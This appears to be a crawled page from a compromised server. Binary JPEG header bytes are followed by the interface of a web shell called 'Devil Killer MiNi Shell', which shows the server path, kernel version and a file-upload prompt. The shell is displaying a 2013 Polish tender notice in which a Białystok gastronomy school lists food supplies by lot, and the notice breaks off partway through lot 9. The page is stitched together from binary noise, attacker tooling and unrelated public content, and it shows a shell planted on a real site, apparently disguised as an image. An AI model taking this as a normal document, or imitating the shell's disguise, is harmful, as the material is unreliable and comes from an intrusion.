JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131125/481378-N-2013.html

<p class="kh_header"><b>Białystok: Sukcesywny zakup i dostawa artykułów spożywczych</b><br>
<b>Numer ogłoszenia: 481378 - 2013; data zamieszczenia: 25.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Gastronomicznych , ul. Knyszyńska 12, 15-702 Białystok, woj. podlaskie, tel. 85 6513854, faks 85 6513405.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywny zakup i dostawa artykułów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywny zakup i dostawa artykułów spożywczych, w/g poniższych PAKIETÓW, tj.: 
PAKIET	1	Rośliny uprawne, produkty warzywnictwa i ogrodnictwa
PAKIET	2	Jaja
PAKIET	3	Ryby świeże, przetworzone oraz śledzie
PAKIET	4	Ziemniaki
PAKIET	5	Produkty zwierzęce, mięso i produkty mięsne
PAKIET	6	Mrożonki
PAKIET	7	Produkty mleczarskie
PAKIET	8	Produkty przemiału ziaren, skrobi i produktów skrobiowych
PAKIET	9	Oleje i tłuszcze roślinne 
PAKIET	10	Owoce i warzywa przetworzone
PAKIET	11	Produkty cukiernicze w gastronomii
PAKIET	12	Pieczywo
PAKIET	13	Cukier, kawa, herbata, słodycze, napoje, alkohol
PAKIET	14	Przyprawy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1, 01.24.20.00-0, 15.20.00.00-0, 15.31.00.00-4, 15.10.00.00-9, 15.33.11.70-9, 15.50.00.00-3, 15.60.00.00-4, 15.40.00.00-2, 15.33.00.00-0, 15.80.00.00-6, 15.81.00.00-9, 15.90.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 14.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, iż wykonawca spełnia warunki udziału w postępowaniu, o których mowa w pkt 3, poprzez złożenie przez wykonawcę oświadczenia wynikającego z art. 44 ustawy (wzór - zał. od nr 1 do 14, stosownie dla właściwego PAKIETU) i tym samym wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert świadczył dostawy minimum trzem podmiotom  w zakresie objętym zamówieniem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto do oferty należy dołączyć następujące informacje i dokumenty:
a)formularz ofertowy (wzór - zał. od nr 1 do 14, stosownie dla właściwego PAKIETU - FORMULARZ OFERTOWY W TRYBIE PRZETARGU NIEOGRANICZONEGO);
b)pełnomocnictwo do podpisywania oferty oraz do podpisywania zobowiązań w imieniu wykonawcy/konsorcjum (np. jeśli ofertę podpisuje osoba/osoby nie figurujące w odpisie z właściwego rejestru);
c)listę podmiotów należących do tej samej grupy kapitałowej w przypadku gdy Wykonawca należy do grupy kapitałowej o  której mowa w art. 24 ust. 2 pkt 5 ustawy;
Złożenie przez wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania jest karalne.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej zamiast dokumentów, o których mowa w ppkt. 2 lit. b-f, może przedłożyć równoważne dokumenty określone Rozporządzeniem Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2013 poz. 231).tj. dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:
a)nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert,
Na podstawie art. 26 ust. 2b ustawy wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółka cywilna, konsorcjum), każdy z wykonawców składa oddzielnie dokumenty wymienione w ppkt 2.
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których wykonawca polega na zasadach określonych w art. 26 ust. 2b ustawy, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez wykonawcę lub te podmioty.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy w zakresie terminu realizacji zamówienia w przypadku powstania okoliczności których nie można było wcześniej przewidzieć, a które uniemożliwiają realizację zamówienia w pożądanym terminie oraz w przypadku zmiany obowiązujących przepisów prawa związanych z przedmiotowym zamówieniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zsg.bialystok.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Gastronomicznych 
ul. Knyszyńska 12 , 
15-702 Białystok, 
pok. BIURA CKP
telefon/fax: /85/6512-989.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2013 godzina 10:00, miejsce: Zespół Szkół Gastronomicznych 
ul. Knyszyńska 12 , 
15-702 Białystok, 
pok. BIURA CKP.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Rośliny uprawne, produkty warzywnictwa i ogrodnictwa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> botwina	kg	5,6
brokuły	kg	6
buraki	kg	767
cebula biała	kg	972
cebula czerwona	kg	1
cukinia	kg	10,2
cykoria	kg	1,4
czosnek  (główki)	kg	22
dynia żółta	kg	26,5
fasola biała drobna	kg	162
groch połówki	kg	125
grzyby suszone  -  borowiki	kg	0,2
kalafior 	kg	0,7
kapusta biała 	kg	1823
kapusta biała młoda	kg	196,4
kapusta czerwona	kg	144
kapusta pekińska	kg	200
Koper	kg	20
Mak	kg	57
Marchew	kg	440
ogórki świeże	kg	340
papryka świeża	kg	135
Pieczarki	kg	730
pietruszka w korzeniu	kg	61,4
pietruszka zielona natka zwykła	pęczek	419
pietruszka zielona natka karbowana	pęczek	59
pomidorki coctailowe	kg	6,6
pomidory świeże	kg	162
pory	kg	162,5
rzepa  SOPEL LODU	kg	77,40
Rzodkiewka	pęczek	159
sałata karbowana	kg	13,8
sałata lodowa	kg	55
sałata masłowa	kg	56,5
seler naciowy	kg	2,3
selery w korzeniu	kg	94,85
Szczypior	kg	35
ziarno sezamu (białe)	kg	2,5
zioła świeże - mięta	szt.	3
banany	kg	88
cytryny 	kg	233
gruszki deserowe	kg	36
Jabłka	kg	467
jabłka deserowe	kg	30
Kiwi	kg	3,80
Limonki	kg	0,5
łuskane pestki dyni	kg	0,6
łuskane pestki słonecznika	kg	3,20
maliny świeże	kg	3,60
Mandarynki	kg	21,5
Melony	kg	17
migdały  (płatki )	kg	2
Nektarynki	kg	21,5
orzechy włoskie łuskane	kg	33
Pomarańcze	kg	22,5
Rabarbar	kg	12
Rodzynki	kg	28
suszone gruszki	kg	7,3
suszone jabłka	kg	5,4
suszone śliwki	kg	2,3
śliwki świeże	kg	59
śliwki wędzone (kalifornijskie)	kg	9
Truskawki	kg	9
winogrona  mix	kg	94
żurawina suszona	kg	12
 (wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja świeże rozmiar L (waga 1 sztuki - od 0,063 do 0,073 kg)	Szt.	26290

(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 01.24.20.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ryby świeże, przetworzone oraz śledzie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> łosoś świeży filet	kg	17
łosoś wędzony - plastry	kg	5,5
pstrąg świeży patroszony	kg	39
szczupak świeży patroszony	kg	9
śledź małosolny 	kg	50
śledź marynowany	kg	8
tuńczyk w puszce ( w oleju w kawałkach, lub w sosie własnym w kawałkach)	 szt.	17
(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki jadalne - odmiana IRGA - (opakowanie min.  25 kg, max. 30 kg)	kg	14543

(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.31.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Produkty zwierzęce, mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> boczek surowy wieprzowy bez żeberek	kg	27
boczek wędzony, parzony bez żeberek 	kg	140
flaki wołowe suche, krojone	kg	34,5
jelita cienkie wieprzowe	mb	100
kabanosy wieprzowe	kg	0,5
Kaczka pekińska	kg	11
karkowina wieprzowa bez kości, bez tłuszczu, bez skóry, duże porcje	kg	335
kiełbasa palcówka podsuszana	kg	1
kiełbasa salami podsuszana	kg	2
kiełbasa surowa wieprzowa	kg	4,2
kiełbasa wieprzowa, podwędzana, zwyczajna	kg	50,5
kurczaki świeże, nieoblodzone	kg	600
łopatka wieprzowa bez kości, bez tłuszczu, bez skóry, duże porcje	kg	745
ozory wieprzowe	kg	28,5
parówki wieprzowe, cienkie	kg	46
piersi z kurczaka	kg	267
piersi z indyka	kg	7
podudzia z kurczaka	kg	95
polędwica typu SOPOCKA	kg	5
polędwiczki wieprzowe surowe	kg	5
schab wieprzowy bez kości, duże porcje	kg	383
serca wieprzowe	kg	22
słonina bez skóry	kg	162
smalec	kg	12
szynka wieprzowa bez kości, bez tłuszczu, bez skóry, duże porcje	kg	531
szynka wieprzowa konserwowa, prasowana, niemielona	kg	23
udka z kurczaka	kg	28
wątróbka z kurczaka	kg	27
wędlina drobiowa - szynka z piersi kurczaka lub indyka	kg	1
wołowina Extra bez kości (udziec wołowy)	kg	123
wołowina z kością (antrykot)	kg	250
żeberka wieprzowe, paski	kg	12
żołądki z kurczaka 	kg	19

(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone, pakowane luzem	kg	65
Brukselka mrożona, pakowana luzem	kg	25
Fasolka szparagowa zielona, mrożona, pakowana luzem	kg	64
Frytki mrożone ziemniaczane, karbowane 	kg	10,5
Kalafior mrożony, pakowany luzem	kg	185
Lody paczkowane różne smaki  (waga minimum 0,5 litra)	L	5,5
Maliny mrożone	kg	1,5
Marchew mrożona kostka, pakowana luzem	kg	28
Marchew mrożona z groszkiem zielonym,  pakowana luzem	kg	96
Mieszanka kompotowa mrożona, pakowana luzem (czarna porzeczka, aronia, truskawka i śliwka)	kg	656
Mieszanka warzywna mrożona siedmioskładnikowa pakowana luzem (kalafior, marchew kapusta brukselka, por, fasolka szparagowa, pietruszka, seler) pakowana luzem	kg	452
Porzeczka czarna mrożona, luzem	kg	8
Paluszki z krabów mrożone	kg	7,2
Ryby mrożone ( miruna lub morszczuk) typu SHATTER PACK ,glazura maksymalnie do 5%	kg	385
Szpinak mrożony pakowany luzem (rozdrobniony brykiet)	kg	220
Truskawki mrożone luzem	kg	40
Włoszczyzna mrożona CIĘTE PASKI, pakowana luzem	kg	1127

(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny pakowany 0,4 ml	kg	53,5
Kefir 0% tłuszczu pakowany 0,4 ml	kg	146
Mleko spożywcze pasteryzowane 2% tłuszczu, typu UHT w opakowaniu kartonowym 1 Litr	L	137
Mleko spożywcze pasteryzowane 2% tłuszczu, w opakowaniu kartonowym 1 Litr	L	1515
Mleko w proszku 3,2 % tłuszczu	kg	39
Ser biały, twarogowy, mielony półtłusty, wyprodukowany z mleka pasteryzowanego, zawierający żywe kultury bakterii mlekowych,  pakowany 0,5 kg	kg	530
Ser biały pleśniowy typu Bree 	kg	2,2
Ser topiony - typu kiełbaska - różne smaki	kg	8
Ser typu FETA, pakowany po 0.27 kg	kg	13
Ser typu MOZARELLA	kg	4,7
Ser żółty typu SALAMI, wyprodukowany z mleka pasteryzowanego, zawierający żywe kultury bakterii mlekowych ,min. 23% tłuszczu w 100 g produktu	kg	68
Serek smakowy typu TWÓJ SMAK kg	7,2
Śmietana do zup, sosów i sałatek 18% tłuszczu, z dodatkiem skrobi modyfikowanej kukurydzianej, zagęszczana pektyną oraz mączką chleba świętojańskiego, pakowana 0,4 kg	kg	1450
Śmietanka kremowa 30% tłuszczu UHT, stabilizowana karagenem - pakowana 1 litr	kg	460
Masło śmietankowe, miks tłuszczowy do smarowania min. 67 % tłuszczu (tłuszcz mleczny35 %, tłuszcz roślinny32 %, na bazie śmietanki pasteryzowanej, zawierające kultury bakterii mlekowych, pakowane 0,2 kg	Kg	25

(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Produkty przemiału ziaren, skrobi i produktów skrobiowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kasza gryczana, pakowana luzem ( min. 0,5 kg, max. 5 kg)	kg	47
Kasza jęczmienna, średnia, ( min. 0,5 kg, max. 5 kg)	kg	55
Kasza manna, pakowana 1 kg	kg	14
Kasza typu  Kus-kus	kg	4
Makaron łazanki	kg	4,5
Makaron drobny - NITKI CIĘTE (zawartość w 100 g produktu - węglowodany 72,7 g, białko 11,5, błonnik 0,8)	kg	123
Makaron gruby - ŚWIDERKI lub KOLANKA, (zawartość w 100 g produktu - węglowodany 72,7 g, białko 11,5, błonnik 0,8)	kg	72
Makaron różny typu (Lasagne, Canelloni, Małe muszelki)	kg	7
Mąka typ 500 pakowana luzem po 25 KG	kg	5003
Mąka ziemniaczana	kg	130
Pęczak	kg	4
Płatki owsiane typu GÓRSKIE	kg	19
Ryż biały, długoziarnisty	kg	80
Ryż preparowany	kg	26
Zacierka makaronowa, dwujajeczna 	kg	50
(wielkość zamówienia i asortyment może ulec zmianie w zakresie do 30 %).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Olej uniwersalny, rzepakowy, rafinowany, o zawartości tłuszczu  10 g , pakowany w 1 litrowych butelkach  	L	1042
Margaryna  francuska typu PUFF PASTRY 80 % tłuszczu, pakowana po 2 kg (w bloku)	Kg	250
